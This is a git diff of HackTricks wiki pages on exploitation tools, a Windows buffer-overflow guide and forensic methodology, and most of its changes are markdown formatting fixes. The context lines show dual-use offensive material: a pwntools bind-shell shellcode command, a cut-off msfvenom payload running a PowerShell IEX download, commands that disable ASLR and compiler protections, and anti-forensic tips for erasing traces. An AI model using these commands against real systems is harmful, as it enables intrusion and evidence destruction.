+**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\
 ****For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\
 _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
 
@@ -147,10 +147,10 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
 
 ## GCC
 
-**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\
+**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\
 **-o** --> Output\
 **-g** --> Save code (GDB will be able to see it)\
-**echo 0 > /proc/sys/kernel/randomize_va_space** --> To deactivate the ASLR in linux
+**echo 0 > /proc/sys/kernel/randomize\_va\_space** --> To deactivate the ASLR in linux
 
 **To compile a shellcode:**\
 **nasm -f elf assembly.asm** --> return a ".o"\
@@ -158,16 +158,16 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
 
 ## Objdump
 
-**-d** --> **Disassemble executable **sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\
-**-Mintel** --> **Intel **syntax\
-**-t** --> **Symbols **table\
-**-D** --> **Disassemble all **(address of static variable)\
+**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\
+**-Mintel** --> **Intel** syntax\
+**-t** --> **Symbols** table\
+**-D** --> **Disassemble all** (address of static variable)\
 **-s -j .dtors** --> dtors section\
 **-s -j .got** --> got section\
-\-D -s -j .plt --> **plt **section **decompiled**\
+\-D -s -j .plt --> **plt** section **decompiled**\
 **-TR** --> **Relocations**\
 **ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\
-**objdump -D ./exec | grep "VAR_NAME"** --> Address or a static variable (those are stored in DATA section).
+**objdump -D ./exec | grep "VAR\_NAME"** --> Address or a static variable (those are stored in DATA section).
 
 ## Core dumps
 
@@ -183,7 +183,7 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
 **strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset of "/bin/sh"
 
 **strace executable** --> Functions called by the executable\
-**rabin2 -i ejecutable --> **Address of all the functions
+**rabin2 -i ejecutable -->** Address of all the functions
 
 ## **Inmunity debugger**
 
@@ -196,12 +196,12 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
 
 ### Debugging in remote linux
 
-Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux_server _or _linux_server64 _inside the linux server and run it nside the folder that contains the binary:
+Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary:
 
 ```
 ./linux_server64 -Ppass
 ```
 
- Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
+&#x20;Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
 
 ![](<../../.gitbook/assets/image (101).png>)
diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md
index cb29690f..9f3754c5 100644
--- a/exploiting/tools/pwntools.md
+++ b/exploiting/tools/pwntools.md
@@ -4,25 +4,25 @@
 pip3 install pwntools
 ```
 
-## Pwn asm 
+## Pwn asm&#x20;
 
-Get opcodes from line or file. 
+Get opcodes from line or file.&#x20;
 
 ```
 pwn asm "jmp esp" 
 pwn asm -i <filepath>
 ```
 
-**Can select: **
+**Can select:**&#x20;
 
 * output type (raw,hex,string,elf)
 * output file context (16,32,64,linux,windows...)
-* avoid bytes (new lines, null, a list) 
+* avoid bytes (new lines, null, a list)&#x20;
 * select encoder debug shellcode using gdb run the output
 
-##   **Pwn checksec**
+## &#x20; **Pwn checksec**
 
-Checksec script 
+Checksec script&#x20;
 
 ```
 pwn checksec <executable>
@@ -30,7 +30,7 @@ pwn checksec <executable>
 
 ## Pwn constgrep
 
-## Pwn cyclic 
+## Pwn cyclic&#x20;
 
 Get a pattern
 
@@ -39,7 +39,7 @@ pwn cyclic 3000
 pwn cyclic -l faad
 ```
 
-**Can select:**    
+**Can select:**   &#x20;
 
 * The used alphabet (lowercase chars by default)
 * Length of uniq pattern (default 4)
@@ -56,21 +56,21 @@ pwn debug --pid 1234
 pwn debug --process bash
 ```
 
-**Can select:** 
+**Can select:**&#x20;
 
-* By executable, by name or by pid context (16,32,64,linux,windows...) 
-* gdbscript to execute 
+* By executable, by name or by pid context (16,32,64,linux,windows...)&#x20;
+* gdbscript to execute&#x20;
 * sysrootpath
 
-## Pwn disablenx 
+## Pwn disablenx&#x20;
 
-Disable nx of a binary  
+Disable nx of a binary &#x20;
 
 ```
 pwn disablenx <filepath>
 ```
 
-## Pwn disasm 
+## Pwn disasm&#x20;
 
 Disas hex opcodes
 
@@ -78,13 +78,13 @@ Disas hex opcodes
 pwn disasm ffe4
 ```
 
-**Can select:** 
+**Can select:**&#x20;
 
-* context (16,32,64,linux,windows...) 
-* base addres 
+* context (16,32,64,linux,windows...)&#x20;
+* base addres&#x20;
 * color(default)/no color
 
-## Pwn elfdiff 
+## Pwn elfdiff&#x20;
 
 Print differences between 2 fiels
 
@@ -92,7 +92,7 @@ Print differences between 2 fiels
 pwn elfdiff <file1> <file2>
 ```
 
-## Pwn hex 
+## Pwn hex&#x20;
 
 Get hexadecimal representation
 
@@ -100,25 +100,25 @@ Get hexadecimal representation
 pwn hex hola #Get hex of "hola" ascii
 ```
 
-## Pwn phd 
+## Pwn phd&#x20;
 
-Get hexdump 
+Get hexdump&#x20;
 
 ```
 pwn phd <file>
 ```
 
- **Can select:** 
+&#x20;**Can select:**&#x20;
 
-* Number of bytes to show 
-* Number of bytes per line highlight byte 
+* Number of bytes to show&#x20;
+* Number of bytes per line highlight byte&#x20;
 * Skip bytes at beginning
 
-## Pwn pwnstrip 
+## Pwn pwnstrip&#x20;
 
 ## Pwn scrable
 
-## Pwn shellcraft 
+## Pwn shellcraft&#x20;
 
 Get shellcodes
 
@@ -136,18 +136,18 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
 * Out file
 * output format
 * debug (attach dbg to shellcode)
-* before (debug trap before code) 
+* before (debug trap before code)&#x20;
 * after
 * avoid using opcodes (default: not null and new line)
 * Run the shellcode
 * Color/no color
-* list syscalls 
-* list possible shellcodes 
+* list syscalls&#x20;
+* list possible shellcodes&#x20;
 * Generate ELF as a shared library
 
-## Pwn template 
+## Pwn template&#x20;
 
-Get a python template 
+Get a python template&#x20;
 
 ```
 pwn template
@@ -155,15 +155,15 @@ pwn template
 
 **Can select:** host, port, user, pass, path and quiet
 
-## Pwn unhex 
+## Pwn unhex&#x20;
 
-From hex to string 
+From hex to string&#x20;
 
 ```
 pwn unhex 686f6c61
 ```
 
-## Pwn update 
+## Pwn update&#x20;
 
 To update pwntools
 
diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
index 475a8e1d..9024598d 100644
--- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
+++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
@@ -4,7 +4,7 @@
 
 ## Restart SLMail service
 
-Every time you need to** restart the service SLMail** you can do it using the windows console:
+Every time you need to **restart the service SLMail** you can do it using the windows console:
 
 ```
 net start slmail
@@ -150,7 +150,7 @@ In this case you can see that **you shouldn't use the char 0x0A** (nothing is sa
 
 ![](<../.gitbook/assets/image (33).png>)
 
-In this case you can see that** the char 0x0D is avoided**:
+In this case you can see that **the char 0x0D is avoided**:
 
 ![](<../.gitbook/assets/image (34).png>)
 
@@ -162,7 +162,7 @@ Using:
 !mona modules    #Get protections, look for all false except last one (Dll of SO)
 ```
 
-You will** list the memory maps**. Search for some DLl that has:
+You will **list the memory maps**. Search for some DLl that has:
 
 * **Rebase: False**
 * **SafeSEH: False**
@@ -194,7 +194,7 @@ msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Obj
 
 If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters).
 
-**Add some NOPS at the beginning **of the shellcode and use it and the return address to JMP ESP, and finish the exploit:
+**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit:
 
 ```bash
 #!/usr/bin/python
diff --git a/forensics/basic-forensic-methodology/README.md b/forensics/basic-forensic-methodology/README.md
index e657a3e5..1485d29e 100644
--- a/forensics/basic-forensic-methodology/README.md
+++ b/forensics/basic-forensic-methodology/README.md
@@ -2,11 +2,11 @@
 
 {% hint style="danger" %}
 Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
-[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop)** so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
+[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
 {% endhint %}
 
-If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks **or** PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to** give ⭐** on **github** to **motivate** **me** to continue developing this book.
+If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
 
 
 
@@ -31,7 +31,7 @@ This **isn't necessary the first step to perform once you have the image**. But
 
 ## Inspecting an Image
 
-if you are given a **forensic image** of a device you can start** analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
+if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
 
 {% content-ref url="partitions-file-systems-carving/" %}
 [partitions-file-systems-carving](partitions-file-systems-carving/)
diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
index 780543ba..ecb45374 100644
--- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
@@ -2,8 +2,8 @@
 
 ## Timestamps
 
-An attacker may be interested in** changing the timestamps of files** to avoid being detected.\
-It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION`_ _and_ _`$FILE_NAME`.
+An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
+It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __ and __ `$FILE_NAME`.
 
 Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB).
 
@@ -24,7 +24,7 @@ The previous image is the **output** shown by the **tool** where it can be obser
 
 ### $LogFile
 
-All metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging).\
+All metadata changes to a file system are logged to ensure the consistent recovery of critical file system structures after a system crash. This is called [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging).\
 The logged metadata is stored in a file called “**$LogFile**”, which is found in a root directory of an NTFS file system.\
 It's possible to use tools like [LogFileParser](https://github.com/jschicht/LogFileParser) to parse this file and find changes.
 
@@ -66,11 +66,11 @@ Then, it's possible to retrieve the slack space using tools like FTK Imager. Not
 ## UsbKill
 
 This is a tool that will **turn off the computer is any change in the USB** ports is detected.\
-A way to discover this would be to inspect the running processes and** review each python script running**.
+A way to discover this would be to inspect the running processes and **review each python script running**.
 
 ## Live Linux Distributions
 
-These distros are **executed inside the RAM** memory. The only way to detect them is** in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion.
+These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion.
 
 ## Secure Deletion
 
@@ -111,7 +111,7 @@ Whenever a folder is opened from an NTFS volume on a Windows NT server, the syst
 ### Delete USB History
 
 All the **USB Device Entries** are stored in Windows Registry Under **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device in your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\
-You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) to be sure you have deleted them (and to delete them).
+You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) to be sure you have deleted them (and to delete them).
 
 Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
 
diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md
index 6d7100aa..7a0f2f56 100644
--- a/forensics/basic-forensic-methodology/docker-forensics.md
+++ b/forensics/basic-forensic-methodology/docker-forensics.md
@@ -26,7 +26,7 @@ A /var/lib/mysql/mysql/general_log.CSV
 ...
 ```
 
-In the previous command **C **means **Changed **and **A,** **Added**.\
+In the previous command **C** means **Changed** and **A,** **Added**.\
 If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with:
 
 ```bash
@@ -58,13 +58,13 @@ container-diff analyze -t history image.tar
 container-diff analyze -t metadata image.tar
 ```
 
-Then, you can **decompress **the image and **access the blobs** to search for suspicious files you may have found in the changes history:
+Then, you can **decompress** the image and **access the blobs** to search for suspicious files you may have found in the changes history:
 
 ```bash
 tar -xf image.tar
 ```
 
-In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive)** **(download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
+In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) **** (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
 
 ```bash
 #First you need to load the image in your docker repo
@@ -75,7 +75,7 @@ Loaded image: flask:latest
 sudo dive flask:latest
 ```
 
-This allow you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red **means added and **yellow **means modified. Use **tab **to move to the other view and **space **to to collapse/open folders.
+This allow you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to to collapse/open folders.
 
 With die you won't be able to access the content of the different stages of the image. To do so you will need to **decompress each layer and access it**.\
 You can decompress all the layers from an image from the directory where the image was decompressed executing:
@@ -89,4 +89,4 @@ for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; don
 
 Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`
 
-Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials **just [**like in the following example**](../../linux-unix/privilege-escalation/#process-memory).
+Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-unix/privilege-escalation/#process-memory).
diff --git a/forensics/basic-forensic-methodology/image-adquisition-and-mount.md b/forensics/basic-forensic-methodology/image-adquisition-and-mount.md
index 6a8c7ac6..e71234ab 100644
--- a/forensics/basic-forensic-methodology/image-adquisition-and-mount.md
+++ b/forensics/basic-forensic-methodology/image-adquisition-and-mount.md
@@ -27,7 +27,7 @@ ftkimager /dev/sdb evidence --e01 --case-number 1 --evidence-number 1 --descript
 
 ### EWF
 
-You can generate a dick image using the[** ewf tools**](https://github.com/libyal/libewf).
+You can generate a dick image using the[ **ewf tools**](https://github.com/libyal/libewf).
 
 ```bash
 ewfacquire /dev/sdb
diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md
index 1a35f7e4..c9e82199 100644
--- a/forensics/basic-forensic-methodology/linux-forensics.md
+++ b/forensics/basic-forensic-methodology/linux-forensics.md
@@ -4,7 +4,7 @@
 
 ### Basic Information
 
-First of all, it's recommended to have some **USB **with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries:
+First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries:
 
 ```bash
 export PATH=/mnt/usb/bin:/mnt/usb/sbin
@@ -35,21 +35,21 @@ find /directory -type f -mtime -1 -print #Find modified files during the last mi
 
 While obtaining the basic information you should check for weird things like:
 
-* **root processes **usually run with low PIDS, so if you find a root process with a big PID you may suspect
-* Check **registered logins **of users without a shell inside `/etc/passwd`
-* Check for **password hashes **inside `/etc/shadow` for users without a shell
+* **root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect
+* Check **registered logins** of users without a shell inside `/etc/passwd`
+* Check for **password hashes** inside `/etc/shadow` for users without a shell
 
 ### Memory Dump
 
 In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
-In order to **compile **it you need to use the **exact same kernel** the victim machine is using.
+In order to **compile** it you need to use the **exact same kernel** the victim machine is using.
 
 {% hint style="info" %}
 Remember that you **cannot install LiME or any other thing** in the victim machine it will make several changes to it
 {% endhint %}
 
 So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms`\
-In other cases you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github can compile it with correct kernel headers. In order to **obtain the exact kernel headers** of the victim machine, you can just **copy the directory **`/lib/modules/<kernel version>` to your machine, and then **compile **LiME using them:
+In other cases you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github can compile it with correct kernel headers. In order to **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/<kernel version>` to your machine, and then **compile** LiME using them:
 
 ```bash
 make -C /lib/modules/<kernel version>/build M=$PWD
@@ -62,14 +62,14 @@ LiME supports 3 **formats**:
 * Padded (same as raw, but with zeroes in right bits)
 * Lime (recommended format with metadata
 
-LiME can also be use to** send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
+LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
 
 ### Disk Imaging
 
 #### Shutting down
 
-First of all you will need to** shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\
-There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem **to be **synchronized**, but I will also allow the possible **malware **to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect **that there may be a **malware**, just execute the **`sync`** **command **on the system and pull the plug.
+First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\
+There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
 
 #### Taking an image of the disk
 
@@ -186,7 +186,7 @@ rpm -qa --root=/ mntpath/var/lib/rpm
 ls /opt /usr/local
 ```
 
-Another good idea is to **check **the **common folders **inside **$PATH** for **binaries not related** to **installed packages:**
+Another good idea is to **check** the **common folders** inside **$PATH** for **binaries not related** to **installed packages:**
 
 ```bash
 #Both lines are going to print the executables in /sbin non related to installed packages
@@ -236,7 +236,7 @@ On Linux systems, kernel modules are commonly used as rootkit components to malw
 There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware.
 
 * _**/etc/profile.d/\***_ , _**/etc/profile**_ , _**/etc/bash.bashrc**_ are executed when any user account logs in.
-* _**∼/.bashrc **_, _**∼/.bash\_profile**_ , _**\~/.profile**_ ,  _**∼/.config/autostart**_ are executed when the specific user logs in.
+* _**∼/.bashrc**_ , _**∼/.bash\_profile**_ , _**\~/.profile**_ ,  _**∼/.config/autostart**_ are executed when the specific user logs in.
 * _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel.
 
 ## Examine Logs
@@ -245,24 +245,24 @@ Look in all available log files on the compromised system for traces of maliciou
 
 ### Pure Logs
 
-**Logon **events recorded in the system and security logs, including logons via the network, can reveal that **malware **or an **intruder gained access **to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation **of a **new** **service **or new accounts around the time of an incident.\
+**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
 Interesting system logons:
 
-* &#x20;**/var/log/syslog **(debian)** **or **/var/log/messages **(Redhat)
+* &#x20;**/var/log/syslog** (debian) **** or **/var/log/messages** (Redhat)
   * Shows general messages and info regarding the system. Basically a data log of all activity throughout the global system.
-* &#x20;**/var/log/auth.log **(debian)** **or **/var/log/secure **(Redhat)
+* &#x20;**/var/log/auth.log** (debian) **** or **/var/log/secure** (Redhat)
   * Keep authentication logs for both successful or failed logins, and authentication processes. Storage depends on system type.
   * `cat /var/log/auth.log | grep -iE "session opened for|accepted password|new session|not in sudoers"`
 * **/var/log/boot.log**: start-up messages and boot info.
-* **/var/log/maillog **or **var/log/mail.log:** is for mail server logs, handy for postfix, smtpd, or email-related services info running on your server.
+* **/var/log/maillog** or **var/log/mail.log:** is for mail server logs, handy for postfix, smtpd, or email-related services info running on your server.
 * **/var/log/kern.log**: keeps in Kernel logs and warning info. Kernel activity logs (e.g., dmesg, kern.log, klog) can show that a particular service crashed repeatedly, potentially indicating that an unstable trojanized version was installed.
 * **/var/log/dmesg**: a repository for device driver messages. Use **dmesg** to see messages in this file.
 * **/var/log/faillog:** records info on failed logins. Hence, handy for examining potential security breaches like login credential hacks and brute-force attacks.
 * **/var/log/cron**: keeps a record of Crond-related messages (cron jobs). Like when the cron daemon started a job.
 * **/var/log/daemon.log:** keeps track of running background services but doesn’t represent them graphically.
 * **/var/log/btmp**: keeps a note of all failed login attempts.
-* **/var/log/httpd/**: a directory containing error\_log and access\_log files of the Apache httpd daemon. Every error that httpd comes across is kept in the **error\_log **file. Think of memory problems and other system-related errors. **access\_log** logs all requests which come in via HTTP.
-* **/var/log/mysqld.log **or** /var/log/mysql.log **: MySQL log file that records every  debug, failure and success message, including starting, stopping and restarting of MySQL daemon mysqld. The system decides on the directory. RedHat, CentOS, Fedora, and other RedHat-based systems use /var/log/mariadb/mariadb.log. However, Debian/Ubuntu use /var/log/mysql/error.log directory.
+* **/var/log/httpd/**: a directory containing error\_log and access\_log files of the Apache httpd daemon. Every error that httpd comes across is kept in the **error\_log** file. Think of memory problems and other system-related errors. **access\_log** logs all requests which come in via HTTP.
+* **/var/log/mysqld.log** or **/var/log/mysql.log** : MySQL log file that records every  debug, failure and success message, including starting, stopping and restarting of MySQL daemon mysqld. The system decides on the directory. RedHat, CentOS, Fedora, and other RedHat-based systems use /var/log/mariadb/mariadb.log. However, Debian/Ubuntu use /var/log/mysql/error.log directory.
 * **/var/log/xferlog**: keeps FTP file transfer sessions. Includes info like file names and user-initiated FTP transfers.
 * **/var/log/\*** : You should always check for unexpected logs in this directory
 
@@ -287,7 +287,7 @@ It's recommended to check if those logins make sense:
 * Any unknown user?
 * Any user that shouldn't have a shell has logged in?
 
-This is important as **attackers **some times may copy `/bin/bash` inside `/bin/false` so users like **lightdm **may be **able to login**.
+This is important as **attackers** some times may copy `/bin/bash` inside `/bin/false` so users like **lightdm** may be **able to login**.
 
 Note that you can also **take a look to this information reading the logs**.
 
@@ -327,20 +327,20 @@ More examples and info inside the github: [https://github.com/snovvcrash/usbrip]
 
 ## Review User Accounts and Logon Activities
 
-Examine the _**/etc/passwd**_, _**/etc/shadow**_ and** security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\
+Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\
 Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
-Finally look for accounts with **no passwords **or **easily guessed **passwords.
+Finally look for accounts with **no passwords** or **easily guessed** passwords.
 
 ## Examine File System
 
-File system data structures can provide substantial amounts of **information **related to a **malware **incident, including the **timing **of events and the actual **content **of **malware**.\
-**Malware **is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\
+File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\
+**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\
 To deal with such anti-forensic techniques, it is necessary to pay **careful attention to time line analysis** of file system date-time stamps and to files stored in common locations where malware might be found.
 
-* Using **autopsy **you can see the timeline of events that may be useful to discover suspicions activity. You can also use the `mactime` feature from **Sleuth Kit **directly.
-* Check for **unexpected scripts **inside **$PATH** (maybe some sh or php scripts?)
+* Using **autopsy** you can see the timeline of events that may be useful to discover suspicions activity. You can also use the `mactime` feature from **Sleuth Kit** directly.
+* Check for **unexpected scripts** inside **$PATH** (maybe some sh or php scripts?)
 * Files in `/dev` use to be special files, you may find non-special files here related to malware.
-* Look for unusual or **hidden files **and **directories**, such as “.. ” (dot dot space) or “..^G ” (dot dot control-G)
+* Look for unusual or **hidden files** and **directories**, such as “.. ” (dot dot space) or “..^G ” (dot dot control-G)
 * setuid copies of /bin/bash on the system `find / -user root -perm -04000 –print`
 * Review date-time stamps of deleted **inodes for large numbers of files being deleted around the same time**, which might indicate malicious activity such as installation of a rootkit or trojanized service.
 * Because inodes are allocated on a next available basis, **malicious files placed on the system at around the same time may be assigned consecutive inodes**. Therefore, after one component of malware is located, it can be productive to inspect neighbouring inodes.
@@ -351,7 +351,7 @@ You can check the most recent files of a folder using `ls -laR --sort=time /bin`
 You can check the inodes of the files inside a folder using `ls -lai /bin |sort -n`&#x20;
 
 {% hint style="info" %}
-Note that an **attacker **can **modify **the **time **to make **files appear** **legitimate**, but he **cannot **modify the **inode**. If you find that a **file **indicates that it was created and modify at the **same time **of the rest of the files in the same folder, but the **inode **is **unexpectedly bigger**, then the **timestamps of that file were modified**.
+Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
 {% endhint %}
 
 ## Compare files of different filesystem versions
diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md
index dd0ad534..bcf328c5 100644
--- a/forensics/basic-forensic-methodology/malware-analysis.md
+++ b/forensics/basic-forensic-methodology/malware-analysis.md
@@ -24,7 +24,7 @@ sudo apt-get install -y yara
 #### Prepare rules
 
 Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
-Create the _**rules **_directory and execute it. This will create a file called _**malware_rules.yar**_ which contains all the yara rules for malware.
+Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware.
 
 ```bash
 wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
@@ -69,12 +69,12 @@ clamscan folderpath #Scan the hole folder
 IOC means Indicator Of Compromise. An IOC is a set of **conditions that identifies** some potentially unwanted software or a confirmed **malware**. Blue Teams use this kind of definitions to **search for this kind of malicious files** in their **systems** and **networks**.\
 To share these definitions is very useful as when a malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.
 
-A tool to create or modify IOCs is** **[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
-****You can use tools such as** **[**Redline**](https://www.fireeye.com/services/freeware/redline.html)** **to **search for defined IOCs in a device**.
+A tool to create or modify IOCs is **** [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
